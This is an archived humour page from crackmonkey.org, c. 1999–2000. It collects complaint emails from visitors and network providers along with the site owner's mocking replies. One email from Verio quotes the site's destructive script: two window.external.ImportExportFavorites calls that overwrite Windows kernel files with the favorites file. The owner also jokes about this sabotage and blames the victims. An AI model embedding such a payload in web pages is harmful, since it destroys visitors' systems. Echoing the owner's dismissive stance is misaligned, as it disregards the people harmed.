- why you suck
- Watch those headers!
- Secondary Nameservice
- Verio Repossesses my Routing
Date: Tue, 19 Oct 1999 21:48:42 -0700 (PDT)
From: patrick sullivan <paddie@rocketmail.com>
Subject: why you suck
To: monkeymaster@crackmonkey.org
Did that get your attention? good. i am disappointed. i am a
programmer, and i have two boxes at home. one is nt, and the other is
linux. i have to use both for work. that is the way it is. i have to
use both f**king browsers at work. that is the reality of the f+&king
situation. my friend and i were talking and i told him how recently i
had quit a job because they wanted me to do ASP COM/DCOM crap and i
disagreed with that technology. so i quit. so i have some strong
feelings with technology.
neverthef@#kingless i visited yr site because my friend said i would
like it. that it was funny and interesting. while we were on the phone,
i popped over to your site to
take a look. moments before i was working and testing some stuff on
the NT box using IE . . . and you fucking know what happens next. now
if this were just my "game box" or whatever, I wouldn't care.
Reinstall the OS, the drivers, the games, etc.
But this is one of my boxes i use for work, like paying my bills. so
now, 2 1/5 hours later and my box still isn't running correctly, i am
going to charge you for my f%^king time. i get paid $90.00 / hour.
The way i see, you are more narrow minded than any hack / drone at
Micro$oft, you damage people's sh!t without any f[a-z]{2}king warning.
The tab comes to $270.00 for 2.5 hours work at $90.00 an hour. you can
write me back
and we can talk about this further OR you can apologize.
i mean, wtf? it seems to me you are just as big a problem as anything
BillG has come up with.
What exactly do you think you are getting across to me? huh? wow,
that some big company makes mistakes? geez, you are a real genius.
what else do you do, look for cracks in the hoover dam and blow it up?
ok, so my little rant and whining is over. i did like the site. you
have some interesting and funny things up. but come on, gimme a break.
seuss
Mr. Sullivan, the crackmonkey.org site makes a simple and polite
request for your browser to overwrite the contents of your OS kernel
with the bookmarks (favorites) file. Some browsers politely turn down
the request, and some happily oblige. I think that this mail (and
others like it) shows poor sportsmanship on the part of the user.
After all, the computer is your friend. Trust the computer.
--Monkeymaster
Date: Thu, 21 Oct 1999 23:41:15 -0700
From: "\"Rocco Mulder\" <rcmulder@efstitle.com>
Subject: Fw: Your site
Date: Fri, 22 Oct 1999 02:32:15 -0400 MIME-Version:1 0 Content-Type:multipart/alternative;boundary = "---- = _NextPart_000_001E_01BF1C35 A76DD260"X-Priority:3 X-MSMail-Priority:Normal X-Mailer:Microsoft Outlook Express 5 00 2615 200 X-MimeOLE:Produced By;, Content-Transfer-Encoding: quoted-printable ----- Original Message ----- = 20 From:Rocco Mulder = 20 To:dns@KENZIK COM = 20 Sent:Friday, October 22, 1999 2:31 AM Subject:Your site Dear Sir or Madam:As I was surfing the net today, I followed a link to your site, = http://crackmonkey com/ Now my computer does not work Every time I try = to boot, it fails I called Microsoft and they told me I have to = reinstall Windows I am now really angry, and I have had to use another = computer to draft this letter to you You hackers may think that it is funny to break into people's systems = and make them stop working, but it isn't You people cost business = millions of dollars every day, and you do not seem to care that real = people are hurt by your actions I fully intend to make an example of = you for your malicious interference with my computer I demand that you pay for the consultant that I must now hire to = reinstall my, you may = consider this service of a formal complaint, and my lawyer will be in = touch with you In this case, I will seek recovery of all legal costs in = this matter, and treble all damages I will also be alerting relevant = government officials, so that they may prosecute you to the fullest = extent of the law It is people like you who ruin the Internet for the rest of us You = should be ashamed Yours,
"Rocco C. Mulder
------=_NextPart_000_001E_01BF1C35.A76DD260
Content-Type": "text/html;
charset=\"iso-8859-1\"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">
<HTML><HEAD>"
<META.conte
Mr Mulder, there appear to be problems with your computing environment
far in excess of your lack of a kernel. I had to convert all of the
periods in your letter to spaces, and get rid of lots of control
characters. It still seems to have managed to get tangled up
irreparably with your headers.
Please let me be the first to assure you that no one has broken into
your computer. On the contrary! The crackmonkey.org site (which you
erroneously refer to as crackmonkey.com) made the request to overwrite
your kernel through the normal channels. It does not contain any
buffer overflows, executable stack exploits, or password discovery
routines. It simply contains code that says "please overwrite your
kernel with the contents of your bookmarks file". Is it my fault that
your computer did so?
I have never met you, and hold no ill will against you. As a matter
of fact, I'm sure we'd enjoy each other's company. Why, I might even
invite you over sometime! We'd sit around the hearth, sharing stories
about our computing careers and drinking heavily.
--Monkeymaster
From: Kevin White <kevin.white@watchguard.com>
To: monkeymaster@crackmonkey.org
Subject: DNS
Date: Fri, 28 Jan 2000 16:24:11 -0800
X-Mailer: Internet Mail Service (5.5.2448.0)
I received your request for assistance hosting your DNS. In fact, I
discovered multiple emails and a voice mail when I returned to my desk
at the end of the day. Bear with me while I recap my perspective on the
situation. I know precious little about you, your sites and how we came
to host DNS for them.
Many months ago, during routine maintenance we discovered a number of
domains in our DNS that we had no explanation for. I asked one of my
co-workers to investigate them to see if we had a legitimate business
reason for providing the service. A simple check revealed your name
associated with most of the domains in question.
One of my co-workers was tasked with looking for web sites associated
with those domains that might explain a link between our organization
and these sites. The first stop was www.crackmonkey.org. While accessing
the site the machine used to access the site experienced major OS
problems. A return visit to the site and a check of the source revealed
code that exploited a known hole in the MS implementation of Java.
At that time we decided we could not afford to be associated with any of
these sites and removed the DNS entries.
I am sure that you are anxious to re-establish communication for your
domains. Based on personal experience your quickest solution to
regaining control is to phone the Internic. They can have it resolved
in a matter of a couple of days. Without a compelling argument to
re-establish the secondary DNS service for these domains we can not
grant your request.
Sincerely,
Kevin White
Director, Information Systems
WatchGuard Technologies
Mr. White, my request was put through in order that I might have
nameservice long enough to remove WatchGuard Technologies from the
crackmonkey.org InterNIC records. Your refusal to grant my request can
only be interpreted as a sign that you wish me to keep the InterNIC
records as they are, showing the support that Watchguard has given to
this site in the past.
As for your description of the site, I must say that for an authorized
secondary nameserver for crackmonkey.org, you have been far too easily
misled. The crackmonkey.org site contains no Java. The HTML is
generated using m4 macros of my own devising, and all pages are 100%
Java-free. The machine hosting the crackmonkey site does not even have
a Java compiler installed!
I can only offer my humblest apologies for the multiple e-mails you
received. During a nameservice crisis, it is often difficult to discern
which mail has been successfully received. Perhaps you could set the
watchguard.com domain nameservice to be served by my machines. Then I
could demonstrate what happens when
one's nameservers stop providing service without even the courtesy of a
notification e-mail.
--Monkeymaster
Date: Sun, 27 Feb 2000 22:40:00 -0800 (PST)
From: Larry Sherman <larry@computerrific.net>
Subject: Re: 204.94.189.42
Message-ID: <Pine.BSF.4.21.0002272220080.8289-100000@home.computerrific.net>
Nick,
I received a notice from Verio Abuse regarding your
'www.crackmonkey.org' site. The complaint had to do with malicious code
in your default page.
Here are the lines involved:
<script>
window.external.ImportExportFavorites(0,"c:\\winnt\system32\\ntoskrnl.exe");
</script>
<script>
window.external.ImportExportFavorites(0,"c:\\winnt\system32\\krnl386.exe");
</script>
Although these system files are "protected" from overwrite, a system
could be destroyed if the unsuspecting visitor had a dual boot setup.
The non-booted system would end up with bookmarks instead of a krnl
file.
I had no choice but to have your site taken off the Net. I expected the
Verio Abused department to contact you. It appears they didn't.
I did hit your site many times, but I wasn't attacking it. I
was testing the null routing of 204.94.189.42. Curiously, my browser
kept accessing your site when it shouldn't have been able to.
You need to contact abuse@verio.net about
the future of your routing.
Regards,
Larry
--
Larry Sherman
Director, Systems Operations
Verio Inc (Best Internet)
Mr Sherman, I would be interested in hearing exactly how this
dual-boot technique works. Microsoft has listed this control as being
"secure", and I am at a loss to understand exactly how it could cause
any damage.
I find it difficult to believe that you had no choice but to
take my entire machine off the Internet. For example, you
could have blocked port 80, or you could have left my machine alone
altogether and issued a public security bulletin.
You could also have notified me of the problem and explained your
malicious intent to me. Instead, you inserted malignant code into the
routers that crackmonkey.org depends on, commencing a Denial of Service
(DoS) attack on my site. Fortunately, I was able to use a complicated
system of local relays to continue my mailing list services, but my
other services were down for nearly a week.
To date, the only people who have complained to me of this problem have
either attempted to extort money from me or have used it as a cheap
excuse after ceasing to provide some legitimately-acquired service to
me. Your message falls in the latter category. Since I have no
alternative network connection at present, I must remove the above
text from the HTML of this site.
Further e-mails described the text in question as being "malicious
code". While code may be malignant, I do not believe that it yet has
the necessary sentience to be "malicious". Please adjust your internal
documentation to reflect this.
--Monkeymaster